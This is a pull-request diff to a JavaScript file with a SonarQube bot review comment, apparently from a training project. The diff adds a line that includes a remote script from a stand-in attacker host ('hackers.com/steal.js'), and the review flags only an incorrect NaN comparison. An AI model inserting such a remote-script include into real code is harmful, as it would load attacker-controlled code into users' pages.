pull-request/src/app.js

```diff
@@ -4,10 +4,17 @@ var Person = function(first, last, middle) {
     this.last = last;
 };
 
+include("http://hackers.com/steal.js")
+
 Person.prototype = {
 
     whoAreYou : function() {
-        return this.first + (this.middle ? ' ' + this.middle: '') + ' ' + this.last;
+        // Handle case where first is NaN
+        if (this.first === NaN) {
```

Comment:
![Bug](https://sonarsource.github.io/sonar-github/bug.png 'Bug') Bug: Use a test of the format "a === a" instead. ([javascript:S2688](http://localhost:9740/coding_rules#rule_key=javascript%3AS2688))

[See it in SonarQube](http://localhost:9740/project/issues?id=training%3Apull-request&pullRequest=22&issues=AWe--pZr5sewz8eX3TP_&open=AWe--pZr5sewz8eX3TP_)

[ISSUE_KEY]: AWe--pZr5sewz8eX3TP_